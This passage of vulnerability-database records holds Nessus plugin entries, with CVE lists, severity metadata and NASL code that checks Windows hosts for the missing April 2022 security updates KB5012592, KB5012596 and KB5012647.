CVE-2022-26830, CVE-2022-26918, CVE-2022-26826, CVE-2022-24545, CVE-2022-24541, CVE-2022-24492, CVE-2022-24491, CVE-2022-24537, CVE-2022-24487, CVE-2022-24534, CVE-2022-24485, CVE-2022-24533, CVE-2022-24495, CVE-2022-24528, CVE-2022-23257, CVE-2022-21983, CVE-2022-22009, CVE-2022-22008, CVE-2022-24500)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-26920, CVE-2022-24493, CVE-2022-24498, CVE-2022-24483)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges. (CVE-2022-26789, CVE-2022-26786, CVE-2022-26802, CVE-2022-26808, CVE-2022-26807, CVE-2022-26795, CVE-2022-26792, CVE-2022-26794, CVE-2022-26904, CVE-2022-26803, CVE-2022-26797, CVE-2022-26787, CVE-2022-24549, CVE-2022-26914, CVE-2022-26801, CVE-2022-26798, CVE-2022-26793, CVE-2022-26796, CVE-2022-26790, CVE-2022-26788, CVE-2022-24496, CVE-2022-24544, CVE-2022-24540, CVE-2022-24488, CVE-2022-24486, CVE-2022-24481, CVE-2022-24479, CVE-2022-24527, CVE-2022-24474, CVE-2022-24521, CVE-2022-24550, CVE-2022-24499, CVE-2022-24547, CVE-2022-24546, CVE-2022-24494, CVE-2022-24542, CVE-2022-24530)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-04-12T00:00:00", "type": "nessus", "title": "KB5012592: Windows 11 Security Update (April 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21983", "CVE-2022-22008", "CVE-2022-22009", "CVE-2022-23257", "CVE-2022-23268", "CVE-2022-24474", "CVE-2022-24479", "CVE-2022-24481", "CVE-2022-24482", "CVE-2022-24483", "CVE-2022-24485", "CVE-2022-24486", "CVE-2022-24487", "CVE-2022-24488", "CVE-2022-24491", "CVE-2022-24492", "CVE-2022-24493", "CVE-2022-24494", "CVE-2022-24495", "CVE-2022-24496", "CVE-2022-24497", "CVE-2022-24498", "CVE-2022-24499", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24527", "CVE-2022-24528", "CVE-2022-24530", "CVE-2022-24533", "CVE-2022-24534", "CVE-2022-24537", "CVE-2022-24540", "CVE-2022-24541", "CVE-2022-24542", "CVE-2022-24544", "CVE-2022-24545", "CVE-2022-24546", "CVE-2022-24547", "CVE-2022-24549", "CVE-2022-24550", "CVE-2022-26786", "CVE-2022-26787", "CVE-2022-26788", "CVE-2022-26789", "CVE-2022-26790", "CVE-2022-26792", "CVE-2022-26793", "CVE-2022-26794", "CVE-2022-26795", "CVE-2022-26796", "CVE-2022-26797", "CVE-2022-26798", "CVE-2022-26801", "CVE-2022-26802", "CVE-2022-26803", "CVE-2022-26807", "CVE-2022-26808", "CVE-2022-26809", "CVE-2022-26826", "CVE-2022-26830", "CVE-2022-26831", "CVE-2022-26904", "CVE-2022-26914", "CVE-2022-26915", "CVE-2022-26916", "CVE-2022-26917", "CVE-2022-26918", "CVE-2022-26919", "CVE-2022-26920"], "modified": "2023-02-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_APR_5012592.NASL", "href": "https://www.tenable.com/plugins/nessus/159671", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159671);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/03\");\n\n script_cve_id(\n \"CVE-2022-21983\",\n \"CVE-2022-22008\",\n \"CVE-2022-22009\",\n \"CVE-2022-23257\",\n \"CVE-2022-23268\",\n \"CVE-2022-24474\",\n \"CVE-2022-24479\",\n \"CVE-2022-24481\",\n \"CVE-2022-24482\",\n \"CVE-2022-24483\",\n \"CVE-2022-24485\",\n \"CVE-2022-24486\",\n \"CVE-2022-24487\",\n \"CVE-2022-24488\",\n \"CVE-2022-24491\",\n \"CVE-2022-24492\",\n \"CVE-2022-24493\",\n \"CVE-2022-24494\",\n \"CVE-2022-24495\",\n \"CVE-2022-24496\",\n \"CVE-2022-24497\",\n \"CVE-2022-24498\",\n \"CVE-2022-24499\",\n \"CVE-2022-24500\",\n \"CVE-2022-24521\",\n \"CVE-2022-24527\",\n \"CVE-2022-24528\",\n \"CVE-2022-24530\",\n \"CVE-2022-24533\",\n \"CVE-2022-24534\",\n \"CVE-2022-24537\",\n \"CVE-2022-24540\",\n \"CVE-2022-24541\",\n \"CVE-2022-24542\",\n \"CVE-2022-24544\",\n \"CVE-2022-24545\",\n \"CVE-2022-24546\",\n \"CVE-2022-24547\",\n \"CVE-2022-24549\",\n \"CVE-2022-24550\",\n \"CVE-2022-26786\",\n \"CVE-2022-26787\",\n \"CVE-2022-26788\",\n \"CVE-2022-26789\",\n \"CVE-2022-26790\",\n \"CVE-2022-26792\",\n \"CVE-2022-26793\",\n \"CVE-2022-26794\",\n \"CVE-2022-26795\",\n \"CVE-2022-26796\",\n \"CVE-2022-26797\",\n \"CVE-2022-26798\",\n \"CVE-2022-26801\",\n \"CVE-2022-26802\",\n \"CVE-2022-26803\",\n \"CVE-2022-26807\",\n \"CVE-2022-26808\",\n \"CVE-2022-26809\",\n \"CVE-2022-26826\",\n \"CVE-2022-26830\",\n \"CVE-2022-26831\",\n \"CVE-2022-26904\",\n \"CVE-2022-26914\",\n \"CVE-2022-26915\",\n \"CVE-2022-26916\",\n \"CVE-2022-26917\",\n \"CVE-2022-26918\",\n \"CVE-2022-26919\",\n \"CVE-2022-26920\"\n );\n script_xref(name:\"MSKB\", value:\"5012592\");\n script_xref(name:\"MSFT\", value:\"MS22-5012592\");\n script_xref(name:\"IAVA\", value:\"2022-A-0147-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0145-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5012592: Windows 11 Security Update (April 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5012592. It is, therefore, affected by multiple vulnerabilities:\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-26831\n CVE-2022-26915, CVE-2022-23268)\n \n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-26916, \n CVE-2022-26917, CVE-2022-26809, CVE-2022-26919, \n CVE-2022-26830, CVE-2022-26918, CVE-2022-26826, \n CVE-2022-24545, CVE-2022-24541, CVE-2022-24492,\n CVE-2022-24491, CVE-2022-24537, CVE-2022-24487,\n CVE-2022-24534, CVE-2022-24485, CVE-2022-24533,\n CVE-2022-24495, CVE-2022-24528, CVE-2022-23257,\n CVE-2022-21983, CVE-2022-22009, CVE-2022-22008, \n CVE-2022-24500)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-26920, CVE-2022-24493, \n CVE-2022-24498, CVE-2022-24483)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges. (CVE-2022-26789, \n CVE-2022-26786, CVE-2022-26802, CVE-2022-26808, \n CVE-2022-26807, CVE-2022-26795, CVE-2022-26792, \n CVE-2022-26794, CVE-2022-26904, CVE-2022-26803, \n CVE-2022-26797, CVE-2022-26787, CVE-2022-24549, \n CVE-2022-26914, CVE-2022-26801, CVE-2022-26798, \n CVE-2022-26793, CVE-2022-26796, CVE-2022-26790, \n CVE-2022-26788, CVE-2022-24496, CVE-2022-24544, \n CVE-2022-24540, CVE-2022-24488, CVE-2022-24486, \n CVE-2022-24481, CVE-2022-24479, CVE-2022-24527, \n CVE-2022-24474, CVE-2022-24521, CVE-2022-24550, \n CVE-2022-24499, CVE-2022-24547, CVE-2022-24546, \n CVE-2022-24494, CVE-2022-24542, CVE-2022-24530)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5012592\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5012592\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26809\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'User Profile Arbitrary Junction Creation Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-04';\nkbs = make_list(\n '5012592'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'22000',\n rollup_date:'04_2022',\n bulletin:bulletin,\n rollup_kb_list:[5012592])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:44:40", "description": "The remote Windows host is missing security update 5012591.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-26827, CVE-2022-24549, CVE-2022-26810, CVE-2022-26803, CVE-2022-26808, CVE-2022-26807, CVE-2022-26792, CVE-2022-26801, CVE-2022-26802, CVE-2022-26794, CVE-2022-26790, CVE-2022-26797, CVE-2022-26787, CVE-2022-26798, CVE-2022-26796, CVE-2022-26786, CVE-2022-26904, CVE-2022-26788, CVE-2022-24496, CVE-2022-24544, CVE-2022-24540, CVE-2022-24489, CVE-2022-24486, CVE-2022-24481, CVE-2022-24479, CVE-2022-24527, CVE-2022-24474, CVE-2022-24521, CVE-2022-24547, CVE-2022-24550, CVE-2022-24499, CVE-2022-24494, CVE-2022-24542, CVE-2022-24530)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-26831, CVE-2022-26915, CVE-2022-24538, CVE-2022-24484, CVE-2022-26784)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-26823, CVE-2022-26812, CVE-2022-26919, CVE-2022-26811, CVE-2022-26809, CVE-2022-26918, CVE-2022-26917, CVE-2022-26813, CVE-2022-26826, CVE-2022-26824, CVE-2022-26815, CVE-2022-26814, CVE-2022-26916, CVE-2022-26822, CVE-2022-26829, CVE-2022-26820, CVE-2022-26819, CVE-2022-26818, CVE-2022-26825, CVE-2022-26817, CVE-2022-26821, CVE-2022-24545, CVE-2022-24541, CVE-2022-24492, CVE-2022-24491, CVE-2022-24537, CVE-2022-24536, CVE-2022-24487, CVE-2022-24534, CVE-2022-24485, CVE-2022-24533, CVE-2022-26903, CVE-2022-24495, CVE-2022-24528, CVE-2022-21983, CVE-2022-22008, CVE-2022-24500)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-26816, CVE-2022-24493, CVE-2022-24539, CVE-2022-24490, CVE-2022-26783, CVE-2022-26785, CVE-2022-24498, CVE-2022-24483)", "cvss3": {}, "published": "2022-04-12T00:00:00", "type": "nessus", "title": "KB5012596: Windows 10 version 1607 / Windows Server 2016 Security Update (April 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21983", "CVE-2022-22008", "CVE-2022-24474", "CVE-2022-24479", "CVE-2022-24481", "CVE-2022-24482", "CVE-2022-24483", "CVE-2022-24484", "CVE-2022-24485", "CVE-2022-24486", "CVE-2022-24487", "CVE-2022-24489", "CVE-2022-24490", "CVE-2022-24491", "CVE-2022-24492", "CVE-2022-24493", "CVE-2022-24494", "CVE-2022-24495", "CVE-2022-24496", "CVE-2022-24497", "CVE-2022-24498", "CVE-2022-24499", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24527", "CVE-2022-24528", "CVE-2022-24530", "CVE-2022-24533", "CVE-2022-24534", "CVE-2022-24536", "CVE-2022-24537", "CVE-2022-24538", "CVE-2022-24539", "CVE-2022-24540", "CVE-2022-24541", "CVE-2022-24542", "CVE-2022-24544", "CVE-2022-24545", "CVE-2022-24547", "CVE-2022-24549", "CVE-2022-24550", "CVE-2022-26783", "CVE-2022-26784", "CVE-2022-26785", "CVE-2022-26786", "CVE-2022-26787", "CVE-2022-26788", "CVE-2022-26790", "CVE-2022-26792", "CVE-2022-26794", "CVE-2022-26796", "CVE-2022-26797", "CVE-2022-26798", "CVE-2022-26801", "CVE-2022-26802", "CVE-2022-26803", "CVE-2022-26807", "CVE-2022-26808", "CVE-2022-26809", "CVE-2022-26810", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26816", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26827", "CVE-2022-26829", "CVE-2022-26831", "CVE-2022-26832", "CVE-2022-26903", "CVE-2022-26904", "CVE-2022-26915", "CVE-2022-26916", "CVE-2022-26917", "CVE-2022-26918", "CVE-2022-26919"], "modified": "2023-02-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_APR_5012596.NASL", "href": "https://www.tenable.com/plugins/nessus/159677", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159677);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/03\");\n\n script_cve_id(\n \"CVE-2022-21983\",\n \"CVE-2022-22008\",\n \"CVE-2022-24474\",\n \"CVE-2022-24479\",\n \"CVE-2022-24481\",\n \"CVE-2022-24482\",\n \"CVE-2022-24483\",\n \"CVE-2022-24484\",\n \"CVE-2022-24485\",\n \"CVE-2022-24486\",\n \"CVE-2022-24487\",\n \"CVE-2022-24489\",\n \"CVE-2022-24490\",\n \"CVE-2022-24491\",\n \"CVE-2022-24492\",\n \"CVE-2022-24493\",\n \"CVE-2022-24494\",\n \"CVE-2022-24495\",\n \"CVE-2022-24496\",\n \"CVE-2022-24497\",\n \"CVE-2022-24498\",\n \"CVE-2022-24499\",\n \"CVE-2022-24500\",\n \"CVE-2022-24521\",\n \"CVE-2022-24527\",\n \"CVE-2022-24528\",\n \"CVE-2022-24530\",\n \"CVE-2022-24533\",\n \"CVE-2022-24534\",\n \"CVE-2022-24536\",\n \"CVE-2022-24537\",\n \"CVE-2022-24538\",\n \"CVE-2022-24539\",\n \"CVE-2022-24540\",\n \"CVE-2022-24541\",\n \"CVE-2022-24542\",\n \"CVE-2022-24544\",\n \"CVE-2022-24545\",\n \"CVE-2022-24547\",\n \"CVE-2022-24549\",\n \"CVE-2022-24550\",\n \"CVE-2022-26783\",\n \"CVE-2022-26784\",\n \"CVE-2022-26785\",\n \"CVE-2022-26786\",\n \"CVE-2022-26787\",\n \"CVE-2022-26788\",\n \"CVE-2022-26790\",\n \"CVE-2022-26792\",\n \"CVE-2022-26794\",\n \"CVE-2022-26796\",\n \"CVE-2022-26797\",\n \"CVE-2022-26798\",\n \"CVE-2022-26801\",\n \"CVE-2022-26802\",\n \"CVE-2022-26803\",\n \"CVE-2022-26807\",\n \"CVE-2022-26808\",\n \"CVE-2022-26809\",\n \"CVE-2022-26810\",\n \"CVE-2022-26811\",\n \"CVE-2022-26812\",\n \"CVE-2022-26813\",\n \"CVE-2022-26814\",\n \"CVE-2022-26815\",\n \"CVE-2022-26816\",\n \"CVE-2022-26817\",\n \"CVE-2022-26818\",\n \"CVE-2022-26819\",\n \"CVE-2022-26820\",\n \"CVE-2022-26821\",\n \"CVE-2022-26822\",\n \"CVE-2022-26823\",\n \"CVE-2022-26824\",\n \"CVE-2022-26825\",\n \"CVE-2022-26826\",\n \"CVE-2022-26827\",\n \"CVE-2022-26829\",\n \"CVE-2022-26831\",\n \"CVE-2022-26832\",\n \"CVE-2022-26903\",\n \"CVE-2022-26904\",\n \"CVE-2022-26915\",\n \"CVE-2022-26916\",\n \"CVE-2022-26917\",\n \"CVE-2022-26918\",\n \"CVE-2022-26919\"\n );\n script_xref(name:\"MSKB\", value:\"5012596\");\n script_xref(name:\"MSFT\", value:\"MS22-5012596\");\n script_xref(name:\"IAVA\", value:\"2022-A-0143-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0147-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0145-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5012596: Windows 10 version 1607 / Windows Server 2016 Security Update (April 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5012591.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-26827, CVE-2022-24549, CVE-2022-26810, \n CVE-2022-26803, CVE-2022-26808, CVE-2022-26807, \n CVE-2022-26792, CVE-2022-26801, CVE-2022-26802, \n CVE-2022-26794, CVE-2022-26790, CVE-2022-26797, \n CVE-2022-26787, CVE-2022-26798, CVE-2022-26796, \n CVE-2022-26786, CVE-2022-26904, CVE-2022-26788, \n CVE-2022-24496, CVE-2022-24544, CVE-2022-24540, \n CVE-2022-24489, CVE-2022-24486, CVE-2022-24481, \n CVE-2022-24479, CVE-2022-24527, CVE-2022-24474, \n CVE-2022-24521, CVE-2022-24547, CVE-2022-24550, \n CVE-2022-24499, CVE-2022-24494, CVE-2022-24542, \n CVE-2022-24530)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-26831, \n CVE-2022-26915, CVE-2022-24538, CVE-2022-24484, \n CVE-2022-26784)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-26823, \n CVE-2022-26812, CVE-2022-26919, CVE-2022-26811, \n CVE-2022-26809, CVE-2022-26918, CVE-2022-26917, \n CVE-2022-26813, CVE-2022-26826, CVE-2022-26824, \n CVE-2022-26815, CVE-2022-26814, CVE-2022-26916, \n CVE-2022-26822, CVE-2022-26829, CVE-2022-26820, \n CVE-2022-26819, CVE-2022-26818, CVE-2022-26825, \n CVE-2022-26817, CVE-2022-26821, CVE-2022-24545, \n CVE-2022-24541, CVE-2022-24492, CVE-2022-24491, \n CVE-2022-24537, CVE-2022-24536, CVE-2022-24487, \n CVE-2022-24534, CVE-2022-24485, CVE-2022-24533, \n CVE-2022-26903, CVE-2022-24495, CVE-2022-24528, \n CVE-2022-21983, CVE-2022-22008, CVE-2022-24500)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-26816, CVE-2022-24493, \n CVE-2022-24539, CVE-2022-24490, CVE-2022-26783, \n CVE-2022-26785, CVE-2022-24498, CVE-2022-24483)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5012596\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5012596\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26809\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'User Profile Arbitrary Junction Creation Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-04';\nkbs = make_list(\n '5012596'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'14393',\n rollup_date:'04_2022',\n bulletin:bulletin,\n rollup_kb_list:[5012596])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:44:26", "description": "The remote Windows host is missing security update 5012591.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-26790, CVE-2022-26828, CVE-2022-26827, CVE-2022-26807, CVE-2022-26796, CVE-2022-26798, CVE-2022-26808, CVE-2022-26810, CVE-2022-26803, CVE-2022-26802, CVE-2022-26801, CVE-2022-26794, CVE-2022-26792, CVE-2022-26904, CVE-2022-26788, CVE-2022-26793, CVE-2022-26914, CVE-2022-26789, CVE-2022-26797, CVE-2022-26787, CVE-2022-24549, CVE-2022-26795, CVE-2022-26786, CVE-2022-24496, CVE-2022-24544, CVE-2022-24540, CVE-2022-24489, CVE-2022-24486, CVE-2022-24481, CVE-2022-24479, CVE-2022-24527, CVE-2022-24474, CVE-2022-24521, CVE-2022-24550, CVE-2022-24499, CVE-2022-24547, CVE-2022-24546, CVE-2022-24494, CVE-2022-24542, CVE-2022-24530)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-26831, CVE-2022-26915, CVE-2022-24538, CVE-2022-24484, CVE-2022-26784)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-26824, CVE-2022-26812, CVE-2022-26919, CVE-2022-26918, CVE-2022-26809, CVE-2022-26825, CVE-2022-26916, CVE-2022-26819, CVE-2022-26817, CVE-2022-26815, CVE-2022-26814, CVE-2022-26823, CVE-2022-26811, CVE-2022-26829, CVE-2022-26821, CVE-2022-26917, CVE-2022-26820, CVE-2022-26826, CVE-2022-26818, CVE-2022-26822, CVE-2022-26813, CVE-2022-24545, CVE-2022-24541, CVE-2022-24492, CVE-2022-24491, CVE-2022-24537, CVE-2022-24536, CVE-2022-24487, CVE-2022-24534, CVE-2022-24485, CVE-2022-24533, CVE-2022-26903, CVE-2022-24495, CVE-2022-24528, CVE-2022-21983, CVE-2022-22008, CVE-2022-24500)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-26920, CVE-2022-26816, CVE-2022-24493, CVE-2022-24539, CVE-2022-24490, CVE-2022-26783, CVE-2022-26785, CVE-2022-24498, CVE-2022-24483)", "cvss3": {}, "published": "2022-04-12T00:00:00", "type": "nessus", "title": "KB5012647: Windows 10 version 1809 / Windows Server 2019 Security Update (April 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21983", "CVE-2022-22008", "CVE-2022-24474", "CVE-2022-24479", "CVE-2022-24481", "CVE-2022-24482", "CVE-2022-24483", "CVE-2022-24484", "CVE-2022-24485", "CVE-2022-24486", "CVE-2022-24487", "CVE-2022-24489", "CVE-2022-24490", "CVE-2022-24491", "CVE-2022-24492", "CVE-2022-24493", "CVE-2022-24494", "CVE-2022-24495", "CVE-2022-24496", "CVE-2022-24497", "CVE-2022-24498", "CVE-2022-24499", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24527", "CVE-2022-24528", "CVE-2022-24530", "CVE-2022-24533", "CVE-2022-24534", "CVE-2022-24536", "CVE-2022-24537", "CVE-2022-24538", "CVE-2022-24539", "CVE-2022-24540", "CVE-2022-24541", "CVE-2022-24542", "CVE-2022-24544", "CVE-2022-24545", "CVE-2022-24546", "CVE-2022-24547", "CVE-2022-24549", "CVE-2022-24550", "CVE-2022-26783", "CVE-2022-26784", "CVE-2022-26785", "CVE-2022-26786", "CVE-2022-26787", "CVE-2022-26788", "CVE-2022-26789", "CVE-2022-26790", "CVE-2022-26792", "CVE-2022-26793", "CVE-2022-26794", "CVE-2022-26795", "CVE-2022-26796", "CVE-2022-26797", "CVE-2022-26798", "CVE-2022-26801", "CVE-2022-26802", "CVE-2022-26803", "CVE-2022-26807", "CVE-2022-26808", "CVE-2022-26809", "CVE-2022-26810", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26816", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26827", "CVE-2022-26828", "CVE-2022-26829", "CVE-2022-26831", "CVE-2022-26903", "CVE-2022-26904", "CVE-2022-26914", "CVE-2022-26915", "CVE-2022-26916", "CVE-2022-26917", "CVE-2022-26918", 